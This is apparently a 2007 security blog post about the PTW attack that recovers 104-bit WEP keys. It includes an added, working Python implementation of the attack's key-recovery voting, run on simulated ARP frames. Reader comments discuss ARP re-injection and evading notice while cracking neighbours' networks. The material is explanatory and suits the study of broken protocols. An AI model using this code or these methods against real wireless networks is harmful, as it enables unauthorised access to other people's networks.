Breaking WEP in Under a Minute

WEP (Wired Equivalent Privacy) was the original protocol used to secure 802.11 wireless networks. It's known to be insecure and has been superseded by Wi-Fi Protected Access (WPA), but it's still in use.

This paper, "Breaking 104 bit WEP in less than 60 seconds," is the best attack against WEP to date:

Abstract:

We demonstrate an active attack on the WEP protocol that is able to recover a 104-bit WEP key using less than 40,000 frames with a success probability of 50%. In order to succeed in 95% of all cases, 85,000 packets are needed. The IV of these packets can be randomly chosen. This is an improvement in the number of required frames by more than an order of magnitude over the best known key-recovery attacks for WEP. On an IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute. The required computational effort is approximately 2^20 RC4 key setups, which on current desktop and laptop CPUs is negligible.
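To make the abstract concrete, here is an added example (not code from the paper or from this post) that simulates the attack end to end in pure Python: WEP encrypts each frame under IV || root key, an ARP frame's first 16 plaintext bytes are known (LLC/SNAP plus the fixed ARP header), so the attacker XORs them out to get keystream, and each (IV, keystream) pair casts one vote per key byte using the Klein/PTW correlation on the first three, IV-driven KSA steps. The root key, the IVs and the frames are constructed here; the ARP re-injection phase is replaced by generating random-IV frames, and the paper's key-ranking step over runner-up candidates is left out, so this is the plain top-vote decision.

```python
# Added example: a pure-Python simulation of the PTW attack the abstract describes.
# Not code from the paper or the post. Root key, IVs and frames are constructed
# here; a real run takes the IV from each 802.11 frame header and the body from a capture.
import random

IV_LEN = 3
KEY_LEN = 13  # 104-bit root key
# An ARP frame's encrypted body starts with a fixed LLC/SNAP header and a fixed
# ARP header, so its first 16 plaintext bytes are known to the attacker. For 13 key
# bytes PTW only uses keystream bytes 2..14, so the request/reply difference in
# byte 15 (OPER = 1 or 2) never matters.
KNOWN_PLAINTEXT = bytes.fromhex("aaaa030000000806" "0001080006040001")


def rc4_ksa(key):
    """Standard RC4 key scheduling: returns the permutation S."""
    S, j, klen = list(range(256)), 0, len(key)
    for i in range(256):
        j = (j + S[i] + key[i % klen]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n bytes of RC4 output under key."""
    S, i, j, out = rc4_ksa(key), 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv, root_key, plaintext):
    """WEP's per-frame RC4 key is IV || root key (CRC-32 ICV left out; PTW ignores it)."""
    ks = rc4_keystream(iv + root_key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


def ptw_guesses(iv, keystream):
    """One frame's guess for sigma_i = K[3] + ... + K[3+i] (mod 256), i = 0..12.
    The IV is public, so the attacker replays the first three KSA steps exactly;
    the Klein/PTW correlation then ties keystream byte 2+i to sigma_i with
    probability about 1.24/256 rather than the 1/256 a random guess would get."""
    S, j = list(range(256)), 0
    for i in range(IV_LEN):
        j = (j + S[i] + iv[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    inv = [0] * 256  # inverse of S after the IV steps
    for pos, val in enumerate(S):
        inv[val] = pos
    guesses, acc = [], 0
    for i in range(KEY_LEN):
        p = IV_LEN + i
        acc = (acc + S[p]) & 0xFF
        guesses.append((inv[(p - keystream[p - 1]) & 0xFF] - j - acc) & 0xFF)
    return guesses


def collect_votes(frames):
    """frames: (iv, encrypted ARP body) pairs. Returns votes[i][candidate sigma_i]."""
    votes = [[0] * 256 for _ in range(KEY_LEN)]
    for iv, body in frames:
        keystream = bytes(c ^ p for c, p in zip(body, KNOWN_PLAINTEXT))
        for i, g in enumerate(ptw_guesses(iv, keystream)):
            votes[i][g] += 1
    return votes


def key_from_votes(votes):
    """Best-voted sigma_i per position, differenced back into key bytes.
    The paper adds key ranking over runners-up; this is the plain top-vote decision."""
    key, prev = [], 0
    for row in votes:
        best = max(range(256), key=row.__getitem__)
        key.append((best - prev) & 0xFF)
        prev = best
    return bytes(key)


def true_sigmas(root_key):
    """The prefix sums sigma_i that the votes are meant to recover."""
    out, acc = [], 0
    for k in root_key:
        acc = (acc + k) & 0xFF
        out.append(acc)
    return out


def simulate_capture(root_key, n_frames, rng):
    """Stand-in for the ARP re-injection phase: encrypted ARP frames with random IVs."""
    frames = []
    for _ in range(n_frames):
        iv = bytes(rng.randrange(256) for _ in range(IV_LEN))
        frames.append((iv, wep_encrypt(iv, root_key, KNOWN_PLAINTEXT)))
    return frames


def vote_bias(root_key, n_frames, seed=2007):
    """Votes the true sigmas received, divided by the n_frames/256 that chance predicts."""
    votes = collect_votes(simulate_capture(root_key, n_frames, random.Random(seed)))
    hits = sum(votes[i][s] for i, s in enumerate(true_sigmas(root_key)))
    return hits / (KEY_LEN * n_frames / 256)


DEMO_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3")  # constructed 104-bit key

if __name__ == "__main__":
    frames = simulate_capture(DEMO_KEY, 100_000, random.Random(42))
    guess = key_from_votes(collect_votes(frames))
    print("recovered:", guess.hex(), "(correct)" if guess == DEMO_KEY else "(wrong; add key ranking)")
```

Running it as a script generates 100,000 frames and prints the recovered key; `vote_bias` shows the statistical core in isolation, returning how far above chance the true key sums score over a given number of frames (about 1.2 at the paper's per-vote probability). Note that the cost per frame is one RC4 key setup, which is why the abstract can describe the whole computation as roughly 2^20 key setups.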

Posted on April 4, 2007 at 12:46 PM • 27 Comments

Comments

MyCat • April 4, 2007 1:05 PM

"The required computational effort is approximately 220 RC4 key setups"

That's 2 to the 20th power in the paper. While a million is still a very small number of key setups, it's still a lot more than 220.

David • April 4, 2007 1:13 PM

I have problems with them saying that it would take a minute. The specific issue I have is gathering the 85,000 packets (to assure a crack at 90+%).

Unless you are forcing replies from the source, you can't sniff 80,000 packets in a minute. Heck, I can't get 85,000 packets from a 100 mbps connection without forcing replies.

We've seen wireless connections that are active all day (being used) with less than 80,000 packets.

The cracking of the key can probably be done in less than a minute, but getting the data can't be done that easily.

Josquin • April 4, 2007 1:19 PM

"On a IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute."

There is how you get the appropriate number of frames.

Aaron • April 4, 2007 1:28 PM

"On a IEEE 802.11g network, the number of frames required can be obtained by re-injection in less than a minute."

This captures an ARP request packet and repeatedly re-sends it, generating up to 3 new packets to capture. On my system ARP requests are 42 bytes and replies are 60 bytes so you could generate 85000 packets with 8.7MB of data xferred if you get one arp reply packet per arp sent. That'll be more than one second on 802.11g but less than two seconds probably.

Anonymous • April 4, 2007 2:34 PM

Is there any practical software available using this method yet? Is there any planned?

Dan • April 4, 2007 3:07 PM

@David:
It's way too easy with the right tools and right wireless card. I don't think I should necessarily mention them here, but they aren't hard to find.

FooDoo • April 4, 2007 4:09 PM

There was a talk at Shmoocon '07 re: cracking WEP using sniffed packets and FPGAs (specialized circuit boards).

Anonymous Pilot • April 4, 2007 4:52 PM

Remember what Bruce said: be careful in designing a cryptographic system, it will be in use for a long fscking time.

The Anonymous Pilot

David • April 4, 2007 5:30 PM

I'm very familiar with forcing traffic and creating traffic, there are a *ton* of tools to do this.

What I was referring to was "passively" sniffing 85,000 frames.

Any time you inject packets something of yours is detectable, possibly the OS, the tool, etc.

If you want to crack it without letting anyone know, you need to do this "passively", and 85,000 packets is a long time when you are doing that.

You guys are like the bank robbers that are blowing up ATMs. Sure you get the money, but you leave a ton of evidence behind..... Not so good, IMHO.

Woody • April 4, 2007 6:12 PM

@David

If the goal is to crack a home network from the curb, who's going to be monitoring the wireless network for a flood of ARPs?

Even with a corporate network, is an attack of this sort likely to be noticed? Running a spoofed MAC ID and pounding the network for, say, 5-10 seconds (to spread it out a bit), is anyone going to notice that host A seemed excessively curious about host B (at the ARP level, not at the IP firewall level)?

Thomas • April 4, 2007 8:24 PM

@David,
"""Any time you inject packets something of yours is detectable, possibly the OS, the tool, etc."""

I doubt that anyone still using WEP is going to be collecting, much less looking at, this sort of stuff.

jose • April 4, 2007 9:58 PM

Well, that is old news, but it comes worse to the people: just change the system and go up to the internet.

Samy • April 4, 2007 10:41 PM

Well, just for the record ... I live in Mexico, and it is VERY HARD to find a WPA secured network here ... It is either open, or WEP :-o. Call it paradise ;-)

A.Person from the UK • April 5, 2007 3:18 AM

In the paper they mention that, looking at sites around Germany, they found many still using WEP. In the UK there are many home networks with no encryption and many that use WEP, as it's the next choice on the list after none.

Warez • April 5, 2007 4:10 AM

@Anonymous,

Good, when the music police come knocking down my door I'll say it was you ;-)

Warez • April 5, 2007 4:13 AM

http://dir.salon.com/story/tech/feature/2004/05/...

"Dear Comcast,

I am so sorry. I had no idea that copyrighted works were being downloaded via my IP address; I have a wireless router at home and it's possible that someone may have been using my connection at the time. I will do my best to secure this notoriously vulnerable technology, but I can make no guarantee that hackers will not exploit my network in the future."

Rick • April 5, 2007 10:07 AM

@Warez

But he lied: he did not "do my best to secure this", he deliberately removed all security. I agree it is a useful letter, but, as we now know that any wireless security is at best a delay, he may as well leave it switched on and not lie.

Greg • April 5, 2007 11:38 AM

@Rick
The intended letter reads "I *will* do my best to secure this", meaning that he will try and sort the problem out after he was informed of the infringement, not that it was already secured.

K. Signal Eingang • April 5, 2007 2:44 PM

I use WEP at home and will probably continue to for some time, for several reasons:

First, WEP is enough to keep the casual bandwidth poachers away, and my apartment building alone has at least two completely unsecured networks running, so I doubt anyone's going to make much of an effort to crack mine.

Second, I've got other controls - my wireless network is isolated from my desktop PCs by a firewall, so even if somebody finds my SSID, cracks my WEP key and hops on the network, they're not going to do anything more serious than leech a few kbps of bandwidth.

Finally and most importantly, the Nintendo DS doesn't support WPA. And I gots to have my Mario Kart!

Anony. Europe • April 6, 2007 12:50 AM

A short but interesting note to those people who take the "better not secure WLAN at all" stand:
in some European countries court decisions have pointed out that the person owning the access point is responsible for proper security. Neglecting this can result in liability for misuse of the access point, including illegal downloads tracked down by IP, hacking, etc.
--> A very bad idea not to secure a wireless LAN properly, at least in Europe; you might as well shoot yourself in the leg.
Happy Easter

Abruzzi • September 18, 2007 6:21 PM

Just simply, I do not see anything new in that PDF :(, only collected information put together...
